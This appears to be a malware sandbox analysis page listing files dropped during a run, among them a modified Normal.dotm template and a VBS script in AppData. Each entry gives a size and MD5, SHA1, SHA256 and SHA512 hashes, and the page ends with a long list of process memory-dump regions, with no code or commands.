936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\miazdqjfytmujpk

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\{9FBE01E4-2F8A-4C27-B5C7-1E51F86DCAD9}

Filesize
128KB

MD5
3b55c2cb3e3827d35fd93be5bdb7500c

SHA1
868da0d50f3edc4b2f6c8a676b3c7d6351c801da

SHA256
36584973e24a5a2250c0073d22c4481e4dc67303d1613be140ee58bb4d5137a1

SHA512
ee07602eb37db825d7527cee7798853587981133c0213f8f6008d8472164eba4101713caed0f597291cff73f0ca16d181a132a8f675bedeaebaee5896f8817b8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
9c82a77d6e23d454f5d73f2b927f44e9

SHA1
dec859222eded0375104ba6577d7cfac37e1ddaf

SHA256
af66f2ddc2eeb4e76a7bdde274952be4e5cb32e07efe5c4732c02868573a1bfa

SHA512
4ad47ba4294d1ef5ddc70e63bc4036b4500e137b3cef8bab2ac79207b7001b0814bc724f01bc8362b1ca431631d4d27de447f20966b2b026bb856dab818158ef

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9384222bd4a40681e3c85fa4abfc4b7d

SHA1
95122294f84e16a1d375ba47feef1ffbba858059

SHA256
735571cde644486b2115f2b3670e01f09351b1fe04961803957584b6453774e6

SHA512
4308c202527a5dc8920082bcba544d92db5e245a053d65733572d8e6463d691dbef862455b10032709ab52c7aacf682ac6208731c76f29a97e71968bc001d297

Download Submit
C:\Users\Admin\AppData\Roaming\lovethemagicof.vbs

Filesize
3KB

MD5
42a639ed01fdadc3e4c1e0841b616836

SHA1
bceb6cf271b588a0e8db0cd6b7117e95c0ce0d30

SHA256
3af8b8b69e8394f2232773c4116988ebbf4d2570d8958540a978a6d5d3263219

SHA512
800a6f54d21491462072da0d26f176030307971bc21ffe1efddb1a1556ac96756fcc54c57de9e87043d188743acb67b468531b14f214766b855ce888903e4258

Download Submit
memory/936-232-0x000000006A5D0000-0x000000006AB7B000-memory.dmp

Filesize
5.7MB

Download
memory/936-144-0x000000006A5D0000-0x000000006AB7B000-memory.dmp

Filesize
5.7MB

Download
memory/936-114-0x000000006A5D0000-0x000000006AB7B000-memory.dmp

Filesize
5.7MB

Download
memory/936-115-0x0000000002780000-0x00000000027C0000-memory.dmp

Filesize
256KB

Download
memory/936-116-0x0000000002780000-0x00000000027C0000-memory.dmp

Filesize
256KB

Download
memory/1008-258-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1008-284-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1008-262-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1008-252-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1008-248-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1008-264-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1716-122-0x000000006A5D0000-0x000000006AB7B000-memory.dmp

Filesize
5.7MB

Download
memory/1716-123-0x000000006A5D0000-0x000000006AB7B000-memory.dmp

Filesize
5.7MB

Download
memory/1716-124-0x00000000027B0000-0x00000000027F0000-memory.dmp

Filesize
256KB

Download
memory/1716-229-0x000000006A5D0000-0x000000006AB7B000-memory.dmp

Filesize
5.7MB

Download
memory/1716-145-0x000000006A5D0000-0x000000006AB7B000-memory.dmp

Filesize
5.7MB

Download
memory/1788-187-0x000000006A5D0000-0x000000006AB7B000-memory.dmp

Filesize
5.7MB

Download
memory/1788-188-0x00000000026D0000-0x0000000002710000-memory.dmp

Filesize
256KB

Download
memory/1788-191-0x00000000026D0000-0x0000000002710000-memory.dmp

Filesize
256KB

Download
memory/1788-194-0x000000006A5D0000-0x000000006AB7B000-memory.dmp

Filesize
5.7MB

Download
memory/1788-189-0x000000006A5D0000-0x000000006AB7B000-memory.dmp

Filesize
5.7MB

Download
memory/1788-190-0x00000000026D0000-0x0000000002710000-memory.dmp

Filesize
256KB

Download
memory/1848-260-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1848-270-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1848-268-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1848-267-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1848-265-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1848-271-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2060-211-0x0000000072B6D000-0x0000000072B78000-memory.dmp

Filesize
44KB

Download
memory/2060-78-0x0000000072B6D000-0x0000000072B78000-memory.dmp

Filesize
44KB

Download
memory/2060-210-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2060-3-0x000000002FA21000-0x000000002FA22000-memory.dmp

Filesize
4KB

Download
memory/2060-5-0x0000000072B6D000-0x0000000072B78000-memory.dmp

Filesize
44KB

Download
memory/2060-7-0x00000000020F0000-0x00000000020F2000-memory.dmp

Filesize
8KB

Download
memory/2108-247-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2108-243-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2108-276-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2108-259-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2108-256-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2108-251-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2788-240-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-220-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-237-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-238-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-228-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-235-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-219-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-287-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-224-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2788-234-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-233-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-223-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-226-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-222-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-221-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-236-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-218-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-217-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-216-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-286-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-285-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-283-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2788-231-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2788-278-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2788-282-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2788-281-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2872-8-0x0000000002EA0000-0x0000000002EA2000-memory.dmp

Filesize
8KB

Download
memory/2872-1-0x0000000072B6D000-0x0000000072B78000-memory.dmp

Filesize
44KB

Download
memory/2872-71-0x0000000072B6D000-0x0000000072B78000-memory.dmp

Filesize
44KB

Download
memory/2872-215-0x0000000072B6D000-0x0000000072B78000-memory.dmp

Filesize
44KB

Download
memory/2872-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download